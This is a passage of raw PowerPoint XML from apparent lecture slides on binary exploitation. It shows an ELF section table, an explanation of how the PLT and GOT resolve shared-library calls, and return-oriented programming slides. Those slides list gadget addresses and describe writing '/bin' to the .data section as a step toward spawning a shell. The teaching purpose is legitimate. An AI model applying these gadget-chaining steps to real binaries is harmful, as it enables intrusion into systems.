              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>       INIT_ARRAY      080e9f68 0a0f68 000008 00  WA  0   0  4  </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[19] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fini_array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>       FINI_ARRAY      080e9f70 0a0f70 000008 00  WA  0   0  4  </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[20] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>jcr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>              PROGBITS        080e9f78 0a0f78 000004 00  WA  0   0  4  </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[21] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>data.rel.ro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>      PROGBITS        080e9f80 0a0f80 000070 00  WA  0   0 32  </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[22] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>got</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>              PROGBITS        080e9ff0 0a0ff0 000008 04  WA  0   0  4  </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[23] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>got.plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>          PROGBITS        080ea000 0a1000 000044 04  WA  0   0  4  </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[24] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>             PROGBITS        080ea060 0a1060 000f20 00  WA  0   0 32  </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[25] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>bss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>              NOBITS          080eaf80 0a1f80 00136c 00  WA  0   0 32  </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[26] __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>libc_freeres_pt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> NOBITS          080ec2ec 0a1f80 000018 00  WA  0   0  4  </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[27] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>comment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>          PROGBITS        00000000 0a1f80 00002b 01  MS  0   0  1  </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[28] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>shstrtab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>         STRTAB          00000000 0a1fab 00014c 00      0   0  1  </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[29] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>symtab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>           SYMTAB          00000000 0a25d0 008b70 10     30 1055  4  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="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[30] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strtab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>           STRTAB          00000000 0ab140 007eac 00      0   0  1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>349</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="161617" y="5216055"/>
            <a:ext cx="8203155" cy="190831"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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29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5" end="1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6" end="1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7" end="1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8" end="18"/>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9" end="19"/>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20" end="20"/>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21" end="21"/>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22" end="22"/>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23" end="23"/>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
                                            <p:txEl>
                                              <p:pRg st="24" end="24"/>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
                                            <p:txEl>
                                              <p:pRg st="25" end="25"/>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
                                            <p:txEl>
                                              <p:pRg st="26" end="26"/>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
                                            <p:txEl>
                                              <p:pRg st="27" end="27"/>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
                                            <p:txEl>
                                              <p:pRg st="28" end="28"/>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
                                            <p:txEl>
                                              <p:pRg st="29" end="29"/>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
                                            <p:txEl>
                                              <p:pRg st="30" end="30"/>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
                                            <p:txEl>
                                              <p:pRg st="31" end="31"/>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
                                            <p:txEl>
                                              <p:pRg st="32" end="32"/>
                                            </p:txEl>
                                          </p:spTgt>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
                                            <p:txEl>
                                              <p:pRg st="33" end="33"/>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
                                            <p:txEl>
                                              <p:pRg st="34" end="34"/>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Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>PLT and GOT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048579" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When a shared library function is called by a program the address called is an entry in the Procedure Linking Table (PLT)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The address contains an indirect jump to the addresses contained in variables stored in the Global Offset Table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The first time a function is called, the GOT address is a jump back to the PLT, where the code to invoke the linker is called</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The linker does its magic and updates the GOT entry, so next time the function is called it can be directly invoked</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Note that the PLT is read-only, but the GOT is not</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="51325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8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85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85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485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ROP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Need to find a gadget that will write some data to a location then return</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>After much searching:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>809a67d:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>89 02</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>809a67f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>:			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>c3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>This gadget will copy whatever’s in %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> into the memory location that %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> points to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>So, if we have %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> be the data "/bin"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>And %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> be &amp;.data (0x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>080ea060</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Then, we will have /bin at a fixed memory location</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Need more gadgets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">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FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>350</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="87748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ROP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Need a gadget to get our data into %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>806e91a:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>5a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>pop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>806e91b:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>c3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>This gadget will take whatever is on the top of the stack and put it in %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>How does this help us?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
